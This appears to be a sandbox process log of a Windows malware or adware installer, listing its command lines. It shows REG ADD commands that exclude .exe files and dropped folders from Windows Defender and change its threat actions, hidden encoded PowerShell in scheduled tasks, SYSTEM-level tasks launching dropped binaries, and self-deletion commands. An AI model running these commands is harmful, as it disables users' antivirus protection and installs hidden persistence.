REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe
C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe /sid=3 /pid=449
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwUPXilBw" /SC once /ST 13:30:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ScanRename.exe" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwUPXilBw"
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2472
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2480
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2412
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe & exit
C:\Windows\system32\PING.EXE
ping 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2460
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2444
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwUPXilBw"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe\" bt /site_id 757674 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\fontview.exe
"C:\Windows\SYSWOW64\fontview.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 3996 -ip 3996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 3996 -ip 3996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 456
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe bt /site_id 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OdCkbftzuRPDCLooswR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WyuevociGfNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XxxUzwYQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\unWhUoTpcLxwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\FZMYpcBymcbXiuVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\FZMYpcBymcbXiuVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HsdHtTcNAoJBjrVs /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnMtnfgYj" /SC once /ST 02:48:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnMtnfgYj"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnMtnfgYj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 15:23:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe\" qz /site_id 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "YESfVrKgbFKcjSeIN"
